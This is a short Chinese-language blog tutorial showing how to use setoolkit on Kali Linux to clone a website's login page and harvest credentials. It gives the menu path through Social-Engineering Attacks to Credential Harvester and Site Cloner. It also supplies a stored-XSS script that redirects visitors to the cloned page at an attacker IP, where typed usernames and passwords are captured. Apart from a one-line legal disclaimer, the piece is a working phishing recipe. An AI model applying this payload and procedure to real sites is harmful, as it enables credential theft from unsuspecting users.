书上说,如果有一天你梦见了一个很久没有见面的人,代表他正在遗忘你。。。

 

--- 网易云热评

 

今天给大家介绍一款克隆网站工具:setoolkit

 

一、环境:kali 2019.04

二、用法:

1、打开终端,输入setoolkit

kali工具 -- setoolkit(克隆网站及利用)_setoolkit

kali工具 -- setoolkit(克隆网站及利用)_setoolkit_02

 

2、选择Social-Engineering Attacks

kali工具 -- setoolkit(克隆网站及利用)_setoolkit_03

3、选择Website Attack Vectors

kali工具 -- setoolkit(克隆网站及利用)_setoolkit_04

4、选择Credential Harvester Attack Method

kali工具 -- setoolkit(克隆网站及利用)_setoolkit_05

5、选择Site Cloner,输入要克隆的网址

kali工具 -- setoolkit(克隆网站及利用)_setoolkit_06

6、构造存在xss漏洞的payload,在存储型xss漏洞处输入下面脚本,提交

<script>window.location="http://192.168.152.171"</script>

7、自动跳转到我们克隆的界面

kali工具 -- setoolkit(克隆网站及利用)_setoolkit_07

8、随便输入账号,提交

kali工具 -- setoolkit(克隆网站及利用)_setoolkit_08

9、在kali机看到输入的账号和密码

kali工具 -- setoolkit(克隆网站及利用)_setoolkit_09

 

禁止非法,后果自负

欢迎大家关注公众号:web安全工具库

kali工具 -- setoolkit(克隆网站及利用)_setoolkit_10